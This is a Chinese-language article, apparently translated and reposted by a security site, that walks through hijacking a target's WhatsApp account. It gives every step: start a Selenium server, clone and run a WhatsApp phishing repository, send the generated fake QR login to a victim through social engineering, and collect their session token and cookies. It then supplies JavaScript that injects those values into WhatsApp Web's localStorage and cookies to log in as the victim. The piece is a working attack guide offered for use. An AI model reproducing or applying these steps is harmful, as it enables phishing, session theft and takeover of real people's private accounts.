WhatsApp是一款非常受欢迎的跨平台应用程序，用于智能手机之间的通讯。本应用程序借助推送通知服务,可以即刻接收亲友和同事发送的信息。可免费从发送手机短信转为使用WhatsApp程序,以发送和接收信息、图片、音频文件和视频信息?。因此，也成为了一些黑客攻击的对象，从中获取用户信息。虽然近段是时间该公司加强了WhatsApp的密码强度，但是永远不要忘记，安全无绝对！

下面，让我们一起看看，如何利用社会工程的方法，来成功获取一个用户的WhatsApp账户。

1.首先让我们先下载一个 独立服务器的 jar 文件 下载地址:?http://www.seleniumhq.org/download/

2.打开命令终端，找到下载的文件。我直接放置在桌面，所以我输入以下命令进到桌面。

Cd /root/Desktop/

3.执行该jar文件，输入命令:

./selenium-server-standalone-2.53.0.jar

现在我们已经启动该服务器，接着我们打开另一个命令终端窗口。

4.下载whatAPP扥钓鱼页面。可以从github下载到。

git clone https://github.com/Mawalu/whatsapp-phishing.git

接着我们进入该文件。

cd whatsapp-phishing

5.输入命令:

npm install

该命令会安装所有需要的东西例如:node.js 和 socket.io等网页和服务器会请求的文件。如果出现错误或文件丢失提示，那么我们必须手动进行安装，否则将看不到效果。

npm install node.js

npm install socket.io

npm install wd

6.接着继续输入命令:

node index.js

这将打开web服务及侦听端口。

7.打开我们的浏览器输入地址:

http://localhost:8080

我们可以看到，用于钓鱼的whatAPP的二维码扫描登录已经生成。

8.现在我们就可以讲生成的二维码通过社工的方法发送给目标，并使其扫描该二维码，当目标输入它的用户身份信息后，我们就可以在本地电脑上，找到目标登录时的cookie信息及验证口令。我们有两种方法进行查看。

（1）.我们可以从如下路径找到生成的数据文件。

/root/whatsapp-phishing/

我们可以看到一个名为 secrets 的文件。

（2）.我们同样也可以直接在命令终端上进行查看。找到密码口令。从 {“s”: and end with?? “c”:””}进行复制。

9.现在，我们已经取得了该目标的token及cookies信息。接着我们打开浏览器进入whatAPP官方的web登录界面?https://web.whatsapp.com/ ，我们不能用手机直接扫描登录。因此，我们可以按F12 进入开发调试模式。在var t=后填写之前复制的信息。

接着在后面跟上代码

> function login(token) {Object.keys(token.s).forEach(function (key) {localStorage.setItem(key, token.s[key])}); token.c = token.c.split(‘;’); token.c.forEach(function(cookie) {document.cookie = cookie; });}

最后跟上:

>login (t)

10.现在让我们重新加载浏览器，我们发现，我们已经成功登陆了目标的账户。

原创翻译，转载请注明来自 即刻安全！

转载请注明：即刻安全 » 如何社工获取Whatsapp账户？